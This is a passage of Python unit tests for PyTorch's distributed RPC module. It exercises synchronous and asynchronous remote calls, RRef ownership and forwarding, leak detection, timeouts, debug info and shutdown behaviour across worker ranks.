worker_name(dst_rank), my_complex_tensor_function, args=(a, b, c)
)
self.assertEqual(ret, my_complex_tensor_function(a, b, c))
@dist_init
def test_py_nested_pickle(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
run_nested_pickle,
args=(MyPickleClass(), torch.ones(2, 2)),
)
m = MyPickleClass()
m.set(my_tensor_function(torch.ones(2, 2), torch.ones(2, 2)))
self.assertEqual(ret, run_nested_pickle(m, torch.ones(2, 2)))
@dist_init
def test_py_function_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
with self.assertRaises(TypeError):
ret = rpc.rpc_sync(worker_name(dst_rank), no_result, args=(10,))
@dist_init
def test_py_raise_in_user_func(self):
with captured_output() as (_, err):
# This barrier prevents a race condition where the main thread has
# not entered the context manager when the remote function runs.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func)
with self.assertRaisesRegex(ValueError, expected_err):
fut.wait()
# This barrier prevents a race condition where the main thread exits
# context manager before the remote function has ran.
dist.barrier()
# Validate that trainers log errors when running functions.
stderr_lines = err.getvalue()
self.assertTrue(expected_err in stderr_lines)
@dist_init
def test_py_raise_in_user_func_escaped_str(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func_escape)
try:
fut.wait()
except ValueError as e:
msg = str(e)
# Ensure newlines are unescaped to provide a better repr of error.
self.assertEqual(msg, msg.encode("utf-8").decode("unicode_escape"))
else:
self.assertTrue(False, "expected raise_func_escape to raise ValueError.")
@dist_init
def test_nested_rpc(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
nested_rpc,
args=(worker_name(self.rank),),
)
self.assertEqual(ret, torch.ones(2, 2) + 1)
def _stress_test_rpc(self, f, repeat=1000, args=()):
n = self.rank + 1
dst_rank = n % self.world_size
futs = []
tik = time.time()
for _ in range(repeat):
fut = rpc.rpc_async(worker_name(dst_rank), f, args=args)
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
tok = time.time()
print(
"Rank {} finished testing {} times in {} seconds.".format(
self.rank, repeat, tok - tik
)
)
@dist_init
def test_stress_light_rpc(self):
self._stress_test_rpc(light_rpc)
@dist_init
def test_stress_heavy_rpc(self):
self._stress_test_rpc(heavy_rpc, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_stress_heavy_rpc_torchscript(self):
self._stress_test_rpc(heavy_rpc_torchscript, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_builtin_remote_ret(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(rref.to_here(), torch.ones(n, n) * 2)
@dist_init
def test_builtin_remote_self(self):
rref = rpc.remote(
worker_name(self.rank),
torch.add,
args=(torch.ones(2, 2), torch.ones(2, 2)),
)
self.assertEqual(rref.local_value(), torch.ones(2, 2) * 2)
def _test_multi_remote_call(self, fn, args_fn=lambda x: (), kwargs_fn=lambda x: {}):
m = 10
n = self.rank + 1
dst_rank = n % self.world_size
rrefs = []
expected = []
for i in range(m):
n = n + i
rrefs.append(
rpc.remote(
worker_name(dst_rank),
fn,
args=args_fn(n),
kwargs=kwargs_fn(n),
)
)
expected.append(fn(*args_fn(n), **kwargs_fn(n)))
for i in range(m):
self.assertEqual(rrefs[i].to_here(), expected[i])
@dist_init
def test_multi_builtin_remote_ret(self):
def args_fn(n):
return (torch.ones(n, n), torch.ones(n, n))
self._test_multi_remote_call(torch.add, args_fn=args_fn)
@dist_init
def test_py_udf_remote(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(rref.to_here(), my_function(n, n + 1, n + 2))
@dist_init
def test_multi_py_udf_remote(self):
def kwargs_fn(n):
return {"a": torch.ones(n, n), "b": torch.ones(n, n), "c": torch.ones(n, n)}
self._test_multi_remote_call(my_function, kwargs_fn=kwargs_fn)
@dist_init
def test_py_rref_args(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 2)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init
def test_py_rref_args_user_share(self):
n = self.rank + 1
owner_rank = n % self.world_size
user_rank = (n + 1) % self.world_size
rref_a = rpc.remote(
worker_name(owner_rank), my_function, args=(torch.ones(n, n), 2, 0)
)
rref_b = rpc.remote(
worker_name(owner_rank), my_function, args=(torch.ones(n, n), 1, 0)
)
rref_c = rpc.remote(
worker_name(user_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init
def test_py_rpc_rref_args(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), my_function, args=(torch.ones(n, n), 2, 0)
)
rref_b = rpc.remote(
worker_name(dst_rank), my_function, args=(torch.ones(n, n), 1, 0)
)
c = rpc.rpc_sync(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(c, torch.ones(n, n) + 4)
@dist_init
def test_nested_remote(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.remote(
worker_name(dst_rank1),
nested_remote,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 3)
@dist_init
def test_nested_rref(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref_of_rrefs = rpc.remote(
worker_name(dst_rank1),
nested_rref,
args=(worker_name(dst_rank2),),
)
# Say C has 2 OwnerRRefs.
# B has 2 UserRRefs to those 2 OwnerRRefs, respectively.
# This call is effectively A asking B to share its 2 UserRRefs.
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), torch.ones(2, 2) + 1)
self.assertEqual(rrefs[1].to_here(), torch.ones(2, 2) + 2)
@dist_init
def test_nested_rref_stress(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
all_rrefs = []
for _ in range(20):
all_rrefs.append(
rpc.remote(
worker_name(dst_rank1),
nested_rref,
args=(worker_name(dst_rank2),),
)
)
for i in range(20):
rref_of_rrefs = all_rrefs[i]
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), torch.ones(2, 2) + 1)
self.assertEqual(rrefs[1].to_here(), torch.ones(2, 2) + 2)
@dist_init
def test_multi_layer_nested_async_rpc(self):
# This test will exit right away, but there will be a chain of async
# RPCs. The termination algorithm should detect those messages properly.
# Otherwise, some peer could exit early, leaving others to timeout
# errors or connection closed errors.
ttl = 20
n = self.rank + 1
dst_rank = n % self.world_size
multi_layer_nested_async_rpc(dst_rank, self.world_size, ttl)
@dist_init
def test_remote_with_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
# check ref to other workers
rref = rpc.remote(worker_name(dst_rank), raise_func)
with self.assertRaises(ValueError):
rref.to_here()
# check ref to itself
rref = rpc.remote(worker_name(self.rank), no_result, args=(10,))
with self.assertRaises(TypeError):
rref.to_here()
@dist_init
def test_rpc_return_rref(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.rpc_sync(
worker_name(dst_rank1),
rpc_return_rref,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 1)
@dist_init
def test_rref_forward_chain(self):
ttl = 8
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
ret_rref = rref_forward_chain(dst_rank, self.world_size, rref, ttl)
for i in range(ttl):
self.assertEqual(len(ret_rref), 1)
ret_rref = ret_rref[0].to_here()
ret = ret_rref
self.assertEqual(ret, torch.add(torch.ones(n, n), 1))
@dist_init
def test_local_rref_no_fork(self):
local_rref = RRef(35)
self.assertEqual(local_rref.local_value(), 35)
@dist_init
def test_local_value_not_on_owner(self):
# ensure that an error message is thrown if a user tries to call
# local_value() on a non-owning node.
next_rank = (self.rank + 1) % self.world_size
rref = rpc.remote(
worker_name(next_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
with self.assertRaisesRegex(
RuntimeError, (
fr"For UserRRef\(rref_id=GloballyUniqueId\(created_on={self.rank}, local_id=0\), "
fr"fork_id=GloballyUniqueId\(created_on={self.rank}, local_id=1\)\), "
r"can't call localValue\(\) on user "
fr"WorkerInfo\(id={self.rank}, name={worker_name(self.rank)}\). "
fr"Call it on owner WorkerInfo\(id={next_rank}, name={worker_name(next_rank)}\)"
)
):
rref.local_value()
@dist_init
def test_return_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_list = rpc.rpc_sync(
worker_name(dst_rank), get_rref_list, args=([1, 2, 3],)
)
for rref in rref_list:
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, 10),
)
rets = [
rpc.rpc_sync(
rref.owner(), _call_method_on_rref, args=(MyClass.get_value, rref)
)
for rref in rref_list
]
self.assertEqual(rets, [11, 12, 13])
@dist_init
def _test_rref_type(self, blocking):
def launched_rpc(events):
expected_name = f"rpc_{RPCExecMode.ASYNC.value}#_rref_typeof_on_owner"
return any([e.name.startswith(expected_name) for e in events])
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, torch.add, args=(torch.ones(2), 1))
with torch.autograd.profiler.profile() as p:
t = rref._get_type(blocking=blocking)
if not blocking:
t = t.wait()
self.assertTrue(launched_rpc(p.function_events))
expected_type = type(torch.ones(2))
self.assertEqual(t, expected_type)
futs = []
def verify(fut):
self.assertEqual(fut.value(), expected_type)
with torch.autograd.profiler.profile() as p:
for _ in range(10):
t = rref._get_type(blocking=blocking)
if not blocking:
futs.append(t)
t.add_done_callback(verify)
t = t.wait()
self.assertEqual(t, expected_type)
if not blocking:
# Note that cached calls with blocking=False all return the same
# cached original future.
first_fut = futs[0]
for f in futs[1:]:
self.assertTrue(f is first_fut)
# Ensure we never launch another RPC, other than for the very
# first call.
self.assertFalse(launched_rpc(p.function_events))
self.assertEqual(t, type(torch.ones(2)))
rref = rpc.remote(dst, MyClass, args=(0,))
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, MyClass)
def test_rref_type_blocking(self):
self._test_rref_type(blocking=True)
def test_rref_type_non_blocking(self):
self._test_rref_type(blocking=False)
@dist_init
def _test_rref_type_with_error(self, blocking):
dst = worker_name((self.rank + 1) % self.world_size)
# 10 ms timeout
rref = rpc.remote(dst, raise_func)
# Blocking: error raised inline
if blocking:
with self.assertRaisesRegex(ValueError, "Expected error"):
rref._get_type(blocking=blocking)
else:
# Non-blocking: Immediately return future, block on wait
fut = rref._get_type(blocking=blocking)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
def test_rref_type_with_error_blocking(self):
self._test_rref_type_with_error(blocking=True)
def test_rref_type_with_error_non_blocking(self):
self._test_rref_type_with_error(blocking=False)
@dist_init
def _test_rref_type_owner(self, blocking):
rref = RRef(torch.ones(2) + 1)
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, type(torch.ones(2)))
rref = RRef(MyClass(0))
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, MyClass)
def test_rref_type_owner_blocking(self):
self._test_rref_type_owner(blocking=True)
def test_rref_type_owner_non_blocking(self):
self._test_rref_type_owner(blocking=False)
@staticmethod
def _slow_add(x, y):
time.sleep(1)
return x + y
@dist_init
def test_rref_type_slow_init(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, RpcTest._slow_add, args=(torch.ones(2), 1))
self.assertEqual(rref._get_type(), type(torch.ones(2)))
@dist_init
def test_owner_equality(self):
a = RRef(40)
b = RRef(50)
other_rank = (self.rank + 1) % self.world_size
other_a = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_b = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_a.to_here() # to ensure clean termination
other_b.to_here()
self.assertNotEqual(a.owner(), 23)
self.assertEqual(other_a.owner(), other_b.owner())
self.assertNotEqual(a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_b.owner())
self.assertEqual(a.owner(), a.owner())
self.assertEqual(a.owner(), b.owner())
self.assertEqual(a.owner(), rpc.get_worker_info())
x = dict()
x[a.owner()] = a
x[other_a.owner()] = other_a
self.assertEqual(x[a.owner()], a)
self.assertEqual(x[b.owner()], a)
self.assertEqual(x[other_a.owner()], other_a)
self.assertEqual(x[other_b.owner()], other_a)
self.assertEqual(len(x), 2)
@dist_init
def test_pass_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker = worker_name(dst_rank)
rref = RRef(40)
self.assertEqual(
rpc.rpc_sync(dst_worker, add_rref_to_value, args=(rref, 50)), 90
)
self.assertEqual(
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 50)).wait(), 90
)
self.assertEqual(
rpc.remote(dst_worker, add_rref_to_value, args=(rref, 50)).to_here(), 90
)
@dist_init
def test_remote_same_worker(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 2)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init(setup_rpc=True)
def test_call_method_on_rref(self):
"""
Tests that it is possible to call an instance method on a remote objet
by using rref.owner() as destination of the call.
"""
vals = [10, 2, 5, 7]
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# creates a remote object
rref = rpc.remote(dst_worker, MyClass, args=(vals[0],))
# modifies state of the remote object
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[1]),
)
rpc.rpc_async(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[2]),
).wait()
rpc.remote(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[3]),
).to_here()
# queries state of the remote object
result = rpc.rpc_sync(
dst_worker, _call_method_on_rref, args=(MyClass.get_value, rref)
)
self.assertEqual(result, sum(vals))
# Notice `rpc.api.shutdown()` accesses
# `_delete_all_user_and_unforked_owner_rrefs` through
# `torch.distributed.rpc.api`, so patching
# `torch.distributed.rpc._delete_all_user_and_unforked_owner_rrefs` will
# not help.
@mock.patch.object(torch.distributed.rpc.api, "_delete_all_user_and_unforked_owner_rrefs")
def _test_rref_leak(self, _mock_delete_all_user_and_unforked_owner_rrefs, ignore_leak):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.ones(2, 2), 1),
)
import torch.distributed.rpc.api as api
if ignore_leak:
api._ignore_rref_leak = True
rpc.shutdown(graceful=True)
else:
api._ignore_rref_leak = False
with self.assertRaisesRegex(RuntimeError, "Leaking RRef"):
rpc.shutdown(graceful=True)
@dist_init(setup_rpc=False)
def test_rref_leak(self):
self._test_rref_leak(ignore_leak=False)
@dist_init(setup_rpc=False)
def test_ignore_rref_leak(self):
self._test_rref_leak(ignore_leak=True)
@dist_init
def test_rref_str(self):
rref1 = RRef(self.rank)
id_class = "GloballyUniqueId"
self.assertEqual(
"OwnerRRef({}(created_on={}, local_id=0))".format(id_class, self.rank), rref1.__str__()
)
dst_rank = (self.rank + 1) % self.world_size
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
self.assertEqual(
rref2.__str__(),
"UserRRef(RRefId = {0}(created_on={1}, local_id=1), ForkId = {0}(created_on={1}, local_id=2))".format(
id_class, self.rank
),
)
@dist_init
def test_rref_get_future(self):
# Tests that we can obtain the future corresponding to the creation of
# the RRef on remote end
if self.rank == 0:
# Builtin
rref = rpc.remote(worker_name(1), torch.add, args=(1, 1))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# UDF
rref = rpc.remote(worker_name(1), foo_add, args=())
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# Script
rref = rpc.remote(worker_name(1), my_script_func, args=(torch.tensor(1), ))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
@dist_init
def test_rref_context_debug_info(self):
# This test checks local states that are modified by remote workers.
# This means that we would need barrier before and after every check.
# The barrier before the check makes sure that all previous states are
# cleared globally, the barrier after ensures that no following states
# change gets into the current check.
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Check 1: local RRef does not update owners_ map or add a pending user.
#################################################
rref1 = RRef(self.rank)
# don't need a barrier here as local RRef is handled by this thread
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertIn("num_pending_users", info)
# RRef on local value is not added to context until shared across RPC
self.assertEqual(0, int(info["num_owner_rrefs"]))
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after the check 1
dist.barrier()
# Check 2: Sharing RRef as an arg should update owners_ map
###########################################################
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(worker_name(dst_rank), set_global_rref, args=(rref1,))
# barrier before check 2
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(1, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 2
dist.barrier()
# clear states for check 2
rpc.rpc_sync(worker_name(dst_rank), clear_global_rref)
# Wait for owner rref to be cleared.
while int(info["num_owner_rrefs"]) != 0:
info = _rref_context_get_debug_info()
time.sleep(0.1)
dist.barrier()
# Check 3: rpc.remote call should update owners_ map
####################################################
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref3 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref2.to_here()
rref3.to_here()
# barrier before check 3
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(2, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 3
dist.barrier()
@dist_init
def test_disable_gil_profiling(self):
# test that rpc.enable_gil_profiling(false) will result in
# GIL wait time not being recorded.
# GIL profiling should be disabled by default.
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertRaises(KeyError, lambda: info["agent.gil_average_wait_time_us"])
rpc.enable_gil_profiling(True)
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.gil_average_wait_time_us", info)
@dist_init(setup_rpc=False)
def test_local_shutdown(self):
# test that we can start RPC and then immediately locally shutdown
# without sending any messages.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init
def test_debug_info(self):
# only test keys in this test case. Values should be covered by
# individual module debug info tests
import torch.distributed.autograd as dist_autograd
info = _get_debug_info()
rref_info = _rref_context_get_debug_info()
agent_info = rpc.api._get_current_rpc_agent().get_debug_info()
autograd_info = dist_autograd._get_debug_info()
common_keys = rref_info.keys() & agent_info.keys() & autograd_info.keys()
self.assertEqual(0, len(common_keys))
expected = {}
expected.update(rref_info)
expected.update(agent_info)
expected.update(autograd_info)
# NB: Key ordering is only preserved in python 3.6+. So here, we
# manually check keys are equal.
for key in expected.keys():
self.assertIn(key, info.keys())
for key in info.keys():
self.assertIn(key, expected.keys())
@dist_init(setup_rpc=False)
@unittest.skipIf(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_handle_send_exceptions(self):
# test that if a callee node has gone down, we raise an appropriate
# exception instead of just crashing.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc._set_rpc_timeout(10)
# This barrier is needed to ensure that some workers do not exit before
# others have been brought up, for non ProcessGroupAgent backends.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
if self.rank == 1:
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# allow destination worker to exit without joining
error_str = self.get_shutdown_error_regex()
wait_until_node_failure(dst_rank, error_str)
fut = rpc.rpc_async(dst_worker, torch.add, args=(torch.ones(1), 3))
# Shutdown sequence is not very well defined and as a result
# we can see any of the error messages defined in get_shutdown_error_regex.
with self.assertRaisesRegex(RuntimeError, error_str):
fut.wait()
# exit all workers non-gracefully.
rpc.shutdown(graceful=False)
@dist_init
def test_deadlock(self):
# this test is copied from https://github.com/pytorch/pytorch/issues/45089
if self.rank == 1:
dst1 = worker_name((self.rank + 1) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
rpc.rpc_async(dst1, RpcTest._slow_add, args=(x, y), timeout=15).wait()
dist_initialized = dist.is_initialized()
if not dist_initialized:
dist.init_process_group(
backend="gloo",
init_method=self.file_init_method,
rank=self.rank,
world_size=self.world_size,
)
@dist_init(setup_rpc=False)
def test_local_shutdown_with_rpc(self):
# test that we can start RPC, send RPCs, and then run local shutdown.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# A barrier is needed to ensure that all RPCs are processed.
# Otherwise, some RPCs can timeout since the receiving end
# has terminated.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init(setup_rpc=False)
def test_set_and_get_default_rpc_timeout(self):
timeout = 0.5
# A new `RpcBackendOptions` is constructed
# when accessing `self.rpc_backend_options`.
rpc_backend_options = self.rpc_backend_options
rpc_backend_options.rpc_timeout = timeout
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
set_timeout = rpc.get_rpc_timeout()
self.assertEqual(timeout, set_timeout)
rpc.shutdown()
@dist_init
def test_default_timeout_used(self):
"""
Tests that if no timeout is passed into rpc_async and rpc_sync, then the
default timeout is used.
"""
dst_rank = (self.rank + 1) % self.world_size
rpc._set_rpc_timeout(0.001) # 1 ms
# futures should time out and be marked with an exception indicating it as such.
futs = [
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=())
for _ in range(10)
]
expected_error = self.get_timeout_error_regex()
for fut in futs:
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# ensure that if a new timeout is set old futures don't time out but new ones do.
rpc._set_rpc_timeout(200) # 200 seconds
# create a longstanding RPC.
fut1 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
# now, set a short timeout.
rpc._set_rpc_timeout(0.001)
# fut2 should time out, fut1 should not.
fut2 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut2.wait()
fut1.wait()
# Zero timeout means infinity, so future should run to completion.
rpc._set_rpc_timeout(0)
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=()).wait()
# reset to default timeout so shutdown messages can process cleanly.
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init
def test_rpc_timeouts(self):
# TODO: enable timeouts for rpc.remote/RRef (https://github.com/pytorch/pytorch/issues/33803)
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
timeout = 0.1 # 100 ms
expected_error = self.get_timeout_error_regex()
# Test async UDF
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if there is no timeout and we use the default
# RPC timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,)).wait()
# Test sync UDF
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
# Ensure run to completion if there is no timeout and we use the default
# RPC timeout.
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# If we set a default timeout for RPCs, it should be respected, though
# still overridden if we pass in a different timeout to the APIs.
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# The RPCs should run to completion since we override the timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=5).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=5)
# Passing in a zero timeout should ensure that the RPC won't time out.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=0).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=0)
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
def test_dist_init_decorator(self):
@dist_init(setup_rpc=False)
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
@dist_init
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
def test_use_rpc_pickler(self):
class TestPickler:
pass
test_pickler = TestPickler()
with _use_rpc_pickler(test_pickler):
self.assertTrue(torch.distributed.rpc.api._default_pickler is test_pickler)
self.assertTrue(
torch.distributed.rpc.api._default_pickler is _internal_rpc_pickler
)
@dist_init
def test_wait_all(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, (torch.ones(2, 2), 1))
self.assertTrue(len(_thread_local_var.future_list) == 1)
self.assertTrue(isinstance(_thread_local_var.future_list[0], torch._C.Future))
self.assertTrue(fut.done())
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_multiple_call(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
for i in range(20):
fut = rpc.rpc_async(dst, torch.add, (torch.ones(i, i), 1))
res = rpc.rpc_sync(dst, torch.add, (torch.ones(i, i), 1))
self.assertEqual(res, torch.ones(i, i) + 1)
self.assertEqual(fut.wait(), torch.ones(i, i) + 1)
self.assertTrue(len(_thread_local_var.future_list) == 20)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_timeout(self):
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
timeout = 0.1 # 100 ms
fut = rpc.rpc_async(dst, my_sleep_func, args=(1,), timeout=timeout)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_user_func(self):
with self.assertRaises(ValueError):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_body(self):
with self.assertRaises(ValueError):
with _wait_all():
raise_func()
self.assertFalse(hasattr(_thread_local_var, "future_list"))
timed_out_rpc_event = None
@staticmethod
def timed_out_rpc():
RpcTest.timed_out_rpc_event.wait()
@dist_init
def test_wait_all_exit_early_python(self):
# Initialize the event in the subprocess.
RpcTest.timed_out_rpc_event = Event()
# Wait for all processes to initialize event.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
dst = worker_name((self.rank + 1) % self.world_size)
fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
fut2 = rpc.rpc_async(dst, raise_func)
fut3 = rpc.rpc_async(dst, raise_func)
# We should receive the error from fut2
